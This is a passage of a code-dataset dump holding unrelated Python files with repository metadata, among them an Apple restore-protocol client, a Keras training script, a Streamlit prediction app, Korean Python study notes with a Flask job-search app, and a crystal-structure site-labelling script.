time\n","repo_name":"lukegre/all_my_code","sub_path":"all_my_code/stats/seas_cycle.py","file_name":"seas_cycle.py","file_ext":"py","file_size_in_byte":8777,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"17923893857","text":"import hashlib\nimport logging\nimport os\nimport plistlib\nimport typing\n\nfrom tqdm import trange\n\nfrom pymobiledevice3.exceptions import PyMobileDevice3Exception\nfrom pymobiledevice3.service_connection import LockdownServiceConnection\n\nASR_VERSION = 1\nASR_STREAM_ID = 1\nASR_PORT = 12345\nASR_FEC_SLICE_STRIDE = 40\nASR_PACKETS_PER_FEC = 25\nASR_PAYLOAD_PACKET_SIZE = 1450\nASR_PAYLOAD_CHUNK_SIZE = 0x20000\nASR_CHECKSUM_CHUNK_SIZE = ASR_PAYLOAD_CHUNK_SIZE\n\nlogger = logging.getLogger(__name__)\n\n\nclass ASRClient(object):\n \"\"\"\n ASR — Apple Software Restore\n \"\"\"\n\n SERVICE_PORT = ASR_PORT\n\n def __init__(self, udid: str):\n self.service = LockdownServiceConnection.create_using_usbmux(udid, self.SERVICE_PORT, connection_type='USB')\n\n # receive Initiate command message\n data = self.recv_plist()\n logger.debug(f'got command: {data}')\n\n command = data.get('Command')\n if command != 'Initiate':\n raise PyMobileDevice3Exception(f'invalid command received: {command}')\n\n self.checksum_chunks = data.get('Checksum Chunks', False)\n logger.debug(f'Checksum Chunks: {self.checksum_chunks}')\n\n def recv_plist(self) -> typing.Mapping:\n buf = b''\n while not buf.endswith(b'\\n'):\n buf += self.service.recv()\n return plistlib.loads(buf)\n\n def send_plist(self, plist: typing.Mapping):\n logger.debug(plistlib.dumps(plist).decode())\n self.service.sendall(plistlib.dumps(plist))\n\n def send_buffer(self, buf: bytes):\n self.service.sendall(buf)\n\n def handle_oob_data_request(self, packet: typing.Mapping, filesystem: typing.IO):\n oob_length = packet['OOB Length']\n oob_offset = packet['OOB Offset']\n filesystem.seek(oob_offset, os.SEEK_SET)\n\n oob_data = filesystem.read(oob_length)\n assert len(oob_data) == oob_length\n\n self.send_buffer(oob_data)\n\n def perform_validation(self, filesystem: typing.IO):\n filesystem.seek(0, os.SEEK_END)\n length = filesystem.tell()\n filesystem.seek(0, os.SEEK_SET)\n\n payload_info = {\n 'Port': 
1,\n 'Size': length,\n }\n\n packet_info = dict()\n if self.checksum_chunks:\n packet_info['Checksum Chunk Size'] = ASR_CHECKSUM_CHUNK_SIZE\n\n packet_info['FEC Slice Stride'] = ASR_FEC_SLICE_STRIDE\n packet_info['Packet Payload Size'] = ASR_PAYLOAD_PACKET_SIZE\n packet_info['Packets Per FEC'] = ASR_PACKETS_PER_FEC\n packet_info['Payload'] = payload_info\n packet_info['Stream ID'] = ASR_STREAM_ID\n packet_info['Version'] = ASR_VERSION\n\n self.send_plist(packet_info)\n\n while True:\n packet = self.recv_plist()\n logger.debug(f'perform_validation: {packet}')\n command = packet['Command']\n\n if command == 'Payload':\n break\n\n elif command == 'OOBData':\n self.handle_oob_data_request(packet, filesystem)\n\n else:\n raise PyMobileDevice3Exception(f'unknown packet: {packet}')\n\n def send_payload(self, filesystem: typing.IO):\n filesystem.seek(0, os.SEEK_END)\n length = filesystem.tell()\n filesystem.seek(0, os.SEEK_SET)\n\n for _ in trange(0, length, ASR_PAYLOAD_CHUNK_SIZE, dynamic_ncols=True):\n chunk = filesystem.read(ASR_PAYLOAD_CHUNK_SIZE)\n\n if self.checksum_chunks:\n chunk += hashlib.sha1(chunk).digest()\n\n self.send_buffer(chunk)\n","repo_name":"doronz88/pymobiledevice3","sub_path":"pymobiledevice3/restore/asr.py","file_name":"asr.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":600,"dataset":"github-code","pt":"61"} +{"seq_id":"39415818451","text":"# ! /usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\nimport arrow\nimport arrow.parser\n\nfrom lib import fields\n\n\nclass DateToInteger(fields.Integer):\n def __init__(self, default=0, **kwargs):\n super(DateToInteger, self).__init__(default=default, **kwargs)\n\n def format(self, value):\n try:\n if value is None:\n return self.default\n if type(value).__name__ == 'int':\n return value\n else:\n if not value.strip():\n return self.default\n return arrow.get(value).timestamp\n except (ValueError, arrow.parser.ParserError) as ve:\n raise fields.MarshallingException(ve)\n\n\ndef dfs_dict(node, api_definitions=None):\n type_format = node.get(\"format\")\n attribute = node.get('attribute')\n node_type = type_format if type_format == 'timestamp' else node.get(\"type\")\n if not node_type:\n ref = node.get('$ref')\n _prefix, ref_node = ref.rsplit('/', 1)\n assert _prefix == '#/definitions' and api_definitions\n return dfs_dict(api_definitions[ref_node])\n if node_type == \"object\":\n nest_dict = {}\n sub_properties = node.get(\"properties\")\n if not sub_properties:\n return fields.Raw(attribute=attribute)\n for subnode in sub_properties.items():\n nest_dict[subnode[0]] = dfs_dict(subnode[1], api_definitions)\n return fields.Nested(nest_dict, attribute=attribute)\n elif node_type == \"array\":\n return fields.List(dfs_dict(node.get(\"items\"), api_definitions), attribute=attribute, default=[])\n elif node_type == 'string':\n return fields.String(default='', attribute=attribute)\n elif node_type == 'integer':\n return fields.Integer(default=-1, attribute=attribute)\n elif node_type == 'timestamp':\n return DateToInteger(default=0, attribute=attribute)\n elif node_type == 'boolean':\n return fields.Boolean(attribute=attribute)\n else:\n raise TypeError(str(node_type) + 'not definition')\n\n\nif __name__ == '__main__':\n 
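# No CLI behavior here; this module is meant to be imported for dfs_dict/DateToInteger.\n    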
pass\n","repo_name":"magigo/json_chaker","sub_path":"lib/my_convertor.py","file_name":"my_convertor.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40634805402","text":"from typing import final\nimport tensorflow as tf\nfrom keras.callbacks import EarlyStopping\nfrom keras.optimizer_v2.adadelta import Adadelta\nimport keras.regularizers as regularizers\nfrom matplotlib import pyplot\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, MaxPooling2D, Conv2D, BatchNormalization, Input, Dropout, \\\n TimeDistributed\nfrom models.autoencoder.autoencoder import ENCODER_MODEL_NAME\nfrom training.training_utils import TRAIN_SET_PATH_MFCCS, TEST_SET_PATH_MFCCS,load_dataset, get_label_number, \\\n one_hot_labels_to_integer_labels, \\\n sparse_categorical_speaker_accuracy_mfccs, sparse_top_k_categorical_speaker_accuracy_mfccs, \\\n speaker_n_states_in_top_k_accuracy_mfccs\n\n\n_EPOCHS_LOAD_REC: final = 1000\n_VERSION_LOAD_REC: final = 1.0\n_REC_AUTOENC_PATH: final = f\"fitted_autoencoder/lstm/autoencoder_lstm_{_EPOCHS_LOAD_REC}_epochs_v{_VERSION_LOAD_REC}\"\n\n\ndef main():\n # Load dataset and labels\n train_mfccs, train_mfccs_labels = load_dataset(TRAIN_SET_PATH_MFCCS)\n test_mfccs, test_mfccs_labels = load_dataset(TEST_SET_PATH_MFCCS)\n total_state_number = get_label_number(train_mfccs_labels)\n\n # Get input shapes\n input_shape_rec_branch = (None, ) + train_mfccs.shape[1:]\n\n # Set model parameters\n tail_dense_units = 512\n\n # Set model training parameters\n epochs = 1\n batch_size = 100\n\n loss = tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=False,\n name='sparse_categorical_crossentropy'\n )\n optimizer = Adadelta(\n learning_rate=1,\n rho=0.95,\n epsilon=1e-7,\n name='adadelta_optimizer'\n )\n metrics = [tf.keras.metrics.SparseCategoricalAccuracy(name=\"Accuracy\", dtype=None),\n tf.keras.metrics.SparseTopKCategoricalAccuracy(k=8, name=\"TopK Accuracy\", dtype=None),\n sparse_top_k_categorical_speaker_accuracy_mfccs,\n sparse_categorical_speaker_accuracy_mfccs,\n speaker_n_states_in_top_k_accuracy_mfccs]\n callbacks = [\n EarlyStopping(monitor='val_loss', patience=100, min_delta=0.001, restore_best_weights=True)\n ]\n\n version = 0.4 # For easy saving of multiple model versions\n\n # Instantiate the model and compile it\n model = Sequential()\n model.add(Input(shape=(train_mfccs.shape[1:])))\n model.add(Dense(units=tail_dense_units,\n activation=tf.keras.layers.LeakyReLU(alpha=0.1),\n kernel_regularizer=regularizers.L1(1e-5)))\n model.add(Dropout(rate=0.5))\n model.add(Dense(units=tail_dense_units,\n activation=tf.keras.layers.LeakyReLU(alpha=0.1),\n kernel_regularizer=regularizers.L1(1e-5)))\n model.add(Dropout(rate=0.5))\n model.add(Dense(total_state_number,\n activation='softmax',\n activity_regularizer=regularizers.L1(1e-5)))\n model.build(input_shape_rec_branch)\n model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n model.summary(expand_nested=True)\n\n # Convert one-hot encoded labels to integer labels\n labels_train = one_hot_labels_to_integer_labels(train_mfccs_labels)\n labels_test = one_hot_labels_to_integer_labels(test_mfccs_labels)\n\n # Train the model\n history = model.fit(\n x=train_mfccs,\n y=labels_train,\n epochs=epochs,\n batch_size=batch_size,\n shuffle=True,\n callbacks=callbacks,\n validation_data=(test_mfccs, labels_test)\n )\n # Save the model to file\n 
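# With a suffix-less path like this, Keras (TF2) saves in the SavedModel format (a directory, not a single file).\n    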
model.save(f'fitted_mlp_predictor/mlp_predictor_{epochs}_epochs_v{version}')\n\n # Plot results loss\n pyplot.plot(history.history['loss'], label='train')\n pyplot.plot(history.history['val_loss'], label='test')\n pyplot.legend()\n pyplot.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MattiaLimone/dnn-hmm","sub_path":"training/mlp_predictor_train_script.py","file_name":"mlp_predictor_train_script.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"14728141642","text":"import streamlit as st\r\nimport pickle\r\nmodel = pickle.load(open('model.pkl','rb'))\r\n\r\ndef predict(sl):\r\n prediction = model.predict([[sl]])\r\n return prediction\r\ndef main():\r\n st.title(\"HR Analytics - Employee retention\")\r\n html_temp = \"\"\"\r\n \r\n
      <div>\r\n
      <h2>Streamlit HR Analytics - Employee retention</h2>\r\n
      \r\n
      <p>If the Prediction is 0 – Person is Not looking for job change, 1 – Person is Looking for a job change</p>\r\n
      </div>\r\n
      \r\n \r\n\r\n\r\n \"\"\"\r\n if st.button(\"About\"):\r\n st.text(\"Output: 0 – Not looking for job change\")\r\n st.text(\"Output: 1 – Looking for a job change \")\r\n\r\n st.markdown(html_temp,unsafe_allow_html=True)\r\n sl = st.text_input(\"Enrollee ID\",\"Type Here\")\r\n \r\n\r\n result = \"\"\r\n if st.button(\"Predict\"):\r\n result = predict(sl)\r\n\r\n st.success('The output is = {}'.format(result))\r\n \r\nmain()","repo_name":"ReddyYesh/Assignment","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3168294347","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf=pd.read_csv('data.csv')\narr = df.to_numpy()\n\n\n# ANALYSING DATA \n\n# Convert 'datetime' column to datetime type\ndf['datetime'] = pd.to_datetime(df['datetime'])\n\n# Calculate short-term (e.g., 50 days) and long-term (e.g., 200 days) SMAs\nshort_window = 50\nlong_window = 200\n\ndf['SMA50'] = df['close'].rolling(window=short_window, min_periods=1).mean()\ndf['SMA200'] = df['close'].rolling(window=long_window, min_periods=1).mean()\n\n# Create signals based on SMA crossovers\ndf['Signal'] = 0 # 0 represents no signal\ndf['Signal'][df['SMA50'] > df['SMA200']] = 1 # 1 represents buy signal\ndf['Signal'][df['SMA50'] < df['SMA200']] = -1 # -1 represents sell signal\n\n# Plot the closing prices and SMAs\nplt.figure(figsize=(10, 6))\nplt.plot(df['datetime'], df['close'], label='Close Price')\nplt.plot(df['datetime'], df['SMA50'], label=f'SMA{short_window}')\nplt.plot(df['datetime'], df['SMA200'], label=f'SMA{long_window}')\n\n# Plot buy signals\nplt.plot(df[df['Signal'] == 1]['datetime'], df[df['Signal'] == 1]['SMA50'], '^', markersize=10, color='g', label='Buy Signal')\n\n# Plot sell signals\nplt.plot(df[df['Signal'] == -1]['datetime'], df[df['Signal'] == -1]['SMA50'], 'v', markersize=10, color='r', label='Sell Signal')\n\nplt.title('Simple Moving Average Crossover Strategy')\nplt.xlabel('Date')\nplt.ylabel('Closing Price')\nplt.legend()\nplt.show()","repo_name":"deep-69bits/INVSTO","sub_path":"dataAnalysis.py","file_name":"dataAnalysis.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23566325001","text":"#! 
/usr/bin/env python3\n\nimport sys\nimport heapq\n\n\ndef solve(n: int, k: int):\n\n rooms = [-n]\n last_room = n\n\n for i in range(k):\n\n room = -heapq.heappop(rooms)\n last_room = room\n\n if room > 2:\n heapq.heappush(rooms, -(room // 2))\n heapq.heappush(rooms, -((room - 1) // 2))\n\n elif room > 1:\n heapq.heappush(rooms, -1)\n\n return last_room // 2, (last_room - 1) // 2\n\n\ndef main():\n f = open(sys.argv[1], 'r')\n\n for i, line in enumerate(f):\n\n if i == 0:\n continue\n\n parts = line.split(' ')\n res = solve(n=int(parts[0]), k=int(parts[1]))\n print('Case #{}: {} {}'.format(i, *res))\n # print('Case {}: {} {}'.format(line.strip(), *res))\n\nif __name__ == '__main__':\n main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1097.py","file_name":"1097.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4252525692","text":"# a = 2\n# b = 3\n# c = a + b\n# print(c)\n# # 파이썬은 코드를 위에서 아래로 읽느다.\n# my_age = 88\n# # snake기법으로 변수지정 camel기법도 가능은 함.\n# my_name = \"huibin\"\n# print(my_name)\n\n# is_live = True\n# print(is_live)\n# print(my_name , \"is\", my_age)\n\n# function 에 대해\n# 함수 만들때\n# def say_hello(e, user_age): #def 함수명(): 공백이 있어야 이 함수 안에 있다는것을 알수있음.\n# print(\"hello\", e, \"how r u\", user_age) #e : parameter\n# print(user_age)\n\n# say_hello(\"nic\", 12) #함수 호출 #nic, ddnic : argument\n# function에 몇개의 argument를 줄수있는가? parameter을 준만큼\n# 함수란 몇번이고 재사용이 가능한 코드\n# parameter 함수안으로 데이터를 보내 함수의 결과를 바꿀 수 있게 하는것\n\n# def tax_calculator(money):\n# print(money * 0.35)\n\n# def say_hello(user_call = \"anonymous\"): #user_call = \"\"값은 기본값을 주는 것.\n# print(\"hello\", user_call)\n\n# say_hello(\"no\")\n# say_hello()\n\n# 과제\n# def plus(a = 7, b = 2):\n# print(a + b)\n\n# def minus(a = 3, b = 7):\n# print(a - b)\n\n# def double(a = 3, b = 2):\n# print(a * b)\n\n# def power_Of(a = 1, b = 8):\n# print(a**b)\n\n# def divide( a= 8, b=2):\n# print(a/b)\n\n# plus(2, 3)\n# minus()\n# double(3, 5)\n# power_Of(2, 4)\n# divide()\n\n# def tax_calc(money):\n# # print(money * 0.35) console에 나타내기만함\n# return money * 0.35\n\n# def pay_tax(tax):\n# print(\"tank you\", tax)\n# pay_tax(tax_calc(144449444))\n\n# 2.8\n# my_name = \"nico\"\n# my_age = 20\n# my_color = \"red\"\n# 위의 변수를 바로 print하기위해서는 f를 앞에 붙이고 {}가 필요.\n# return은 값을 가지고 그걸 함수 바깥으로 준다.그리고 파이썬은 그값을 잡아 코드에 대입시켜준다.그리고 return을 쓰면 바로 함수 끝 return이후의 코드는 파이썬이 작동하지 않는다.\n# print(f\"hello {my_name} here, \")\n\n# def make_juice(fruit):\n# return f\"{fruit}+🏖\"\n# print(\"sfsfs\") >> 안나타남 왜냐면 return으로 함수를 끝냈기 때문\n\n# def add_ice(juice):\n# return f\"{juice}+🥇\"\n\n# def add_sugar(iced_juice):\n# return f\"{iced_juice}+🍍\"\n\n# juice = make_juice(\"🍔\")\n# cold = add_ice(juice)\n# perfect = add_sugar(cold)\n# print(perfect)\n\n# 3.0 if, else, elif(else if같은거)\n# password_correct = False\n# if password_correct:\n# print(\"HEre is yours\")\n# else:\n# print(\"no\")\n# winner = 8\n\n# if winner > 10:\n# print(\"winner win\")\n# elif winner < 10:\n# print(\"winner lose\")\n# else:\n# print(\"winner 10\")\n\n# input함수 : 사용자에게 질문, type함수, int() : 정수로 만듬 - built-in function\n# age = int(input(\"How old r u\"))\n# if age < 18:\n# print(\"no\")\n# elif 18 <= age and age < 35:\n# print(\"mid\")\n# elif age == 60 or age == 70:\n# print(\"birth\")\n# else :\n# print(\"yes\")\n#3.4\n\"\"\"\nfrom random import randint >>파이썬의 기본으로 가지고 있는 다양한 친구들?\n\nuser_choice = int(input(\"choose num\"))\npc_choice = randint(1, 50) #i imported 
this >>1부터 50중의 랜덤한 숫자를 고름.\n\nif user_choice == pc_choice:\n print(\"you won\")\nelif user_choice > pc_choice:\n print(\"lower\", pc_choice)\nelif user_choice < pc_choice:\n print(\"higher\")\n \n#3.5 while 내가 스탑하기 전까지 계속 동작, if와 비슷 벗 멈추지 않는다.\n# 조건이 false가 될때까지 동작함.\n\ndistance = 0\nwhile distance < 20:\n print(\"im running\", distance, \"km\")\n distance = distance + 1\n# distance가 20이 되는 순간 함수는 멈춤.\n\nfrom random import randint\n\nprint(\"welcome\")\npc_choice = randint(1, 50) #i imported this\n# pc가 1-50의 랜던숫자 픽\nplaying = True\n\nwhile playing: #true일때만 진행되는 게임\n user_choice = int(input(\"choose num(1-50)\"))\n if user_choice == pc_choice:\n print(\"you won\")\n playing = False #맞추면 게임 중지시키기\n elif user_choice > pc_choice:\n print(\"lower\", pc_choice)\n elif user_choice < pc_choice:\n print(\"higher\")\n\n \n\"\"\"\n# 4.0 method\n# python의 데이터 구조 (3가지)\n# data structure(자료구조): 데이터를 구조화하고 싶을 때 사용\n# 1. list 2. tuple 3. dictionary\n# method : 데이터 뒤에 결합/연결된 function >> name.count(), upper()\n# name = \"lora\"\n# print(name.endswith(\"o\")), reverse, clear()\n# list\n# days_of_week = [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", [1,2,3], True]\n# print(days_of_week[5])\n\n# 2. tuple : 불변성을 가진다. 즉, 튜플을 변경하지 못한다.\n# days = (\"Mon\", \"Tue\", \"Wed\")\n# print(days[-1])\n\n# 3. dictionary\n# 사전하면 단어와 정의가 있다. key-value로 보면 됨. key(단어) value(정의)\n# player = {\n# 'name': 'nico',\n# 'age' : 12,\n# 'alive' : True,\n# 'food': [\"🥐\", \"🍊\"],\n# 'friend': {\n# \"name\" : \"lynn\",\n# \"food\" : [\"dd\"]\n# }\n# }\n# player['xp'] = 23333 >>key-value 추가하기\n# player['food'] = \"🍊\" >>변경하기\n# print(player['friend']['food'])\n# print(player.get('food')) >> food라는 key값 불러올때\n\n#4.4 loop\n'''\nfrom requests import get\n\nwebsites = [\n \"google.com\", \"https://httpstat.us/502\", \"https://httpstat.us/404\",\n \"https://httpstat.us/300\", \"https://httpstat.us/200\",\n \"https://httpstat.us/101\"\n]\n#https://httpstat.us/xxx is service for generating HTTP codes\n\nresults = {}\n\n#for(loop)\nfor website in websites: #웹사이트 리스트 안의 내용들 하나씩\n if not website.startswith(\"https://\"): #하나씩 만약 http://로 시작안하는 친구들은\n website = f\"https://{website}\" #붙여줘라.\n response = get(website) #response는 하나씩 가져온다.\n code_check = response.status_code #response만 프린트하면 string도 함께 나온다. 그래서 상태코드만 불러낼 수 잇다.\n\n if code_check == 200:\n # print(f\"{website} is ok\")\n results[website] = \"good\"\n elif code_check < 200:\n results[website] = \"continue\"\n elif code_check > 200 and code_check < 300:\n results[website] = \"ok\"\n elif 300 <= code_check < 400:\n results[website] = \"redirect\"\n elif 400 <= code_check < 500:\n results[website] = \"not good\"\n elif code_check > 500:\n results[website] = \"too bad\"\nprint(results)\n\n#pypi 사이트는 파이썬의 다양한 모듈을 사람들이 만들어 놓은 곳이다. 원하는 기능을 찾아서 사용가능하다.\n#4.6 requests : 내가 사이트로 이동할 때 request 된다.\n# 내 브라우저는 google 서버에 request를 보내고 google서버는 나한테 웹사이트를 보내준다.\n# get : function이다. 이동한 후 website를 가져오는 것.\n# get은 response를 return해준다.\n# response는 웹사이트의 응답이다.\n# 인터넷은 HTTP protocol에 기반한다. 
그래서 컴터들이 서로 소통하는 방식은 http request이다.\n# 따라서 인터넷이 잘 작동되는지 확인하기 위해 http 상태 코드를 확인함.\n# response 200은 확인해보면 잘 작동한다는 뜻\n# 100은 continue를 의미, 200성공적, 300 redirection cash, 400은 잘 안됬을때 , 500 error\n'''\n\n#5.1 웹스크래핑 : 너가 쓴 코드가 웹사이트에 들어가서 데이터를 추출해내는 것.\n# beautifulsoup을 통해 html의 언어를 파이썬으로 가져올 수 있다.\n#beautifulsoup는 모든 것을 파이썬의 데이터 구조로 우리가 쓸 수 있는 entity를 가져온다.\n'''\n#class_= \"jobs\" >>keyword argument은 자리에 신경쓰지 않고 argument의 이름에 신경쓰겠다는 것이다.\n#\ndef say_hello(name, age):\n print(f\"Hello {name} {age}\")\n\nsay_hello(\"nico\", 12) #자리의 순서가 중요한 표현법\nsay_hello(age = 12, name = \"nico\") #자리보다 네임이 중요한 표현법\n\n#\npython에서 object의 list를 가지고 있고 list의 길이를 안다면 변수를 일일이 저장하지 않아도 한번에 지정이 가능하다. array나 list\nex) list_of_num = [1, 2, 3]\n first, second, third = list_of_num \n'''\n\n\n# recursive = False => 바로 아래만 찾아줌\n# mosaic zone까지 바로 포함되는 문제점있음\n#jobs = job_list.find_all('li', recursive=False)\n# None 은 아무것도 없을 때\n#5.17 .replace(\",\" , \" \") >>> 콤마를 스페이스로 대체한다.\n\n# from extractors.indeed import extract_indeed_jobs\n# from extractors.wwr import extract_wwr_jobs\n# from file import save_to_file\n\n# keyword = input(\"What do you want to search?\")\n# indeed = extract_indeed_jobs(keyword)\n# wwr = extract_wwr_jobs(keyword)\n# jobs = indeed + wwr\n\n# save_to_file(keyword, jobs)\n\n# 6.0 flask 는 웹사이트를 만들고, 사용자 입력을 처리하고, 파일을 전달하고, html파일을 user에게 보여줌\nfrom flask import Flask, render_template, request, redirect, send_file\nfrom extractors.indeed import extract_indeed_jobs\nfrom extractors.wwr import extract_wwr_jobs\nfrom file import save_to_file\n#request : 브라우저가 웹사이트에 가서 콘텐츠를 요청하는 것이다.\n\n#user에 응답\napp = Flask(__name__)\n\n@app.route(\"/\") #decorator html과 연동\ndef home():\n return render_template(\"home.html\", name=\"huibin\") \n #html에 변수주기\n #name = \"huibin\"이라는 request가 도착하면 Flask는 변수를 가지고 html 템플릿 안에 있는 변수를 request한 값으로 대체하여 user에게 전달된다.\n #위의 상황을 rendering이라 한다.\ndb = {}\n\n@app.route(\"/search\")\ndef search():\n keyword = request.args.get(\"keyword\")\n if keyword == \"\":\n return redirect(\"/\")\n if keyword in db:\n jobs = db[keyword]\n else:\n indeed = extract_indeed_jobs(keyword)\n wwr = extract_wwr_jobs(keyword)\n jobs = indeed + wwr\n db[keyword] = jobs\n return render_template(\"search.html\", keyword=keyword, jobs=jobs)\n\n#파일로 export하기 위해 만든 함수.\n@app.route(\"/export\") #url 설정\ndef export():\n keyword = request.args.get(\"keyword\") #키워드 가져오기\n if keyword == \"\": #키워드 안찾고 search버튼 누를경우 리다이렉트\n return redirect(\"/\")\n if keyword == None: #키워드가 없을 경우 리다이렉트\n return redirect(\"/\")\n if keyword not in db: #우리의 데이터베이스에 없을경우에 그 키워드를 search하는 페이지로 이동\n return redirect(f\"/search?keyword={keyword}\")\n save_to_file(keyword, db[keyword])\n return send_file(f\"{keyword}.csv\", as_attachment=True) #파일의이름, as_attachment=True는 다운로드 실행\n\napp.run(\"127.0.0.1\")","repo_name":"huibinkim/nomad-coder","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10315,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36328419310","text":"import argparse\nimport sys\nimport re\n\nimport numpy as np\n\n\ndef pargs():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"file\")\n parser.add_argument(\"celltile\")\n parser.add_argument(\"-b\", \"--base\", help=\"Set the new base as.\")\n parser.add_argument(\"-k\", \"--kagome\", help=\"Element on the kagome sites.\")\n parser.add_argument(\"-i\", \"--interlayer\", help=\"Element on the interlayer sites.\")\n return parser.parse_args()\n\n\ndef 
herbertsmithite_hamming_ish_id(file, cell, new_base=None, kago=None, ilay=None):\n if kago is None:\n kago = \"Cu\"\n if ilay is None:\n ilay = \"Zn\"\n with open(file, \"r\") as f:\n txt = f.read()\n lines = txt.splitlines()\n i = 0\n j = -1\n for k, line in enumerate(lines):\n if line.lower().strip().startswith(r\"%block positions_frac\"):\n i = k\n if line.lower().strip().startswith(r\"%endblock positions_frac\"):\n j = k\n poslist = lines[i + 1 : j]\n posl = [\n (str(x[0]), tuple(map(float, x[1:])))\n for x in [line.strip().split() for line in poslist]\n if str(x[0]) in [kago, ilay]\n ]\n xyz = np.array([a for _, a in posl])\n basis = np.array([[1 / x] for x in cell if x > 1])\n basis_alt = np.array([[1 / x] for x in cell])\n base_site_ind = np.argwhere(\n (np.linalg.norm(xyz - 0.5, axis=1) - np.linalg.norm(basis / 2)) == 0\n )\n ks = base_site_ind.flatten()\n bs = xyz[ks]\n ks_ord = ks.copy()\n for d in range(2, -1, -1):\n ind = bs[:, d].argsort(kind=\"mergesort\")\n bs = bs[ind]\n ks_ord = ks_ord[ind]\n base_sites = xyz[ks_ord]\n base_entries = [posl[k] for k in ks_ord]\n base_ids = [s == kago for s, _ in base_entries]\n base_str = \"\".join(map(str, map(int, base_ids)))\n if new_base is None:\n return base_str\n if \"1\" in base_str:\n print(f\"Base cell must not have {kago} in interlayer.\", file=sys.stderr)\n sys.exit(1)\n new_ids = [bool(int(i)) for i in new_base]\n if len(new_ids) != len(ks):\n print(\n \"Something went wrong. Number of new entries different than number of base sites found.\"\n )\n sys.exit(1)\n flips = ks_ord[new_ids]\n unord_flip_ids = np.searchsorted(ks, flips)\n k = 0\n new_poslist = []\n for line in poslist:\n if ilay in line:\n if k in unord_flip_ids:\n new_poslist.append(re.sub(ilay, kago, line))\n else:\n new_poslist.append(line)\n k += 1\n else:\n new_poslist.append(line)\n return \"\\n\".join(lines[: i + 1] + new_poslist + lines[j:])\n\n\ndef main():\n ns = pargs()\n cell = tuple(map(int, ns.celltile.split(\"x\")))\n print(herbertsmithite_hamming_ish_id(ns.file, cell, ns.base, ns.kagome, ns.interlayer))\n","repo_name":"ScottNotFound/skit","sub_path":"skit/scripts/herby.py","file_name":"herby.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"691406915","text":"#!/usr/bin/env python\n\n\"\"\"\nCLI entrypoint\n\"\"\"\n\nfrom __future__ import print_function\n\nimport json\nimport pprint\nimport textwrap\nfrom argparse import ArgumentParser\nfrom os import path\nfrom pprint import pprint\nfrom subprocess import CalledProcessError\nfrom sys import stdout, version_info\n\nfrom offutils_strategy_register import fetch_node, list_nodes\nfrom pkg_resources import resource_filename\n\nfrom .__init__ import __version__, root_logger\nfrom .process_node import ProcessNode\n\nif version_info[0] == 3:\n from io import StringIO\n from itertools import filterfalse\nelse:\n try:\n from cStringIO import StringIO\n except ImportError:\n from StringIO import StringIO\n from itertools import ifilterfalse as filterfalse\n\n\ndef _build_parser():\n \"\"\"\n Parser constructing function\n\n :return: instanceof ArgumentParser\n :rtype: ```ArgumentParser```\n \"\"\"\n parser = ArgumentParser(\n prog=\"python -m offregister\",\n description=\"Register node to cluster(s). 
Node is found by manual specification, or popped from a queue.\",\n epilog=\"Example usage: %(prog)s -q etcd -r mesos:location -r etcd:location -r consul:location\",\n )\n parser.add_argument(\"-d\", \"--dns\", help=\"DNS for node (if no queue)\")\n parser.add_argument(\"-i\", \"--ip\", help=\"Public IP for node (if no queue)\")\n parser.add_argument(\n \"-q\", \"--queue\", help='Type of queue. Default: \"etcd\"', default=\"etcd\"\n )\n parser.add_argument(\n \"-l\",\n \"--queue-location\",\n help='Location of queue. Default: \"http://localhost:2379\"',\n default=\"http://localhost:2379\",\n )\n parser.add_argument(\n \"-r\",\n \"--register\",\n nargs=\"+\",\n help=\"Join node to which cluster(s). Example: mesos:location, etcd:location\",\n )\n parser.add_argument(\n \"-c\",\n \"--config\",\n help=\"Schema file. Can use the same one across all off- CLIs.\",\n default=path.join(\n path.dirname(resource_filename(\"offregister\", \"__main__.py\")),\n \"_config\",\n \"register.sample.json\",\n ),\n )\n parser.add_argument(\n \"-w\",\n \"--within\",\n help=\"Clusters to set nodes within [/unclustered/* (from .json conf)]\",\n )\n parser.add_argument(\n \"-m\",\n \"--method\",\n help=\"Method to run. E.g.: `tail` or `set_clusters`. [set_clusters]\",\n default=\"set_clusters\",\n )\n parser.add_argument(\n \"-a\",\n \"--method-args\",\n help='Method args. Use with --method. Example: \"-f -n 20\"',\n default=tuple(),\n )\n parser.add_argument(\n \"--version\", action=\"version\", version=\"%(prog)s {}\".format(__version__)\n )\n return parser\n\n\ndef process_within(register_within, config, method, method_args):\n \"\"\"\n Helper function to process a collection of tasks from a dictionary\n\n :param register_within: List of clusters to register the node's operation to\n :type register_within: ```Iterable[str]```\n\n :param config: dictionary for config\n :type config: ```dict```\n\n :param method: Which method to run\n :type method: ```str```\n\n :param method_args: Arguments to provide to the function by the `method` name\n :type method_args: ```Tuple[str]```\n \"\"\"\n if not len(register_within):\n raise Exception(\"No clusters found to join this node to\")\n\n for cluster_location in 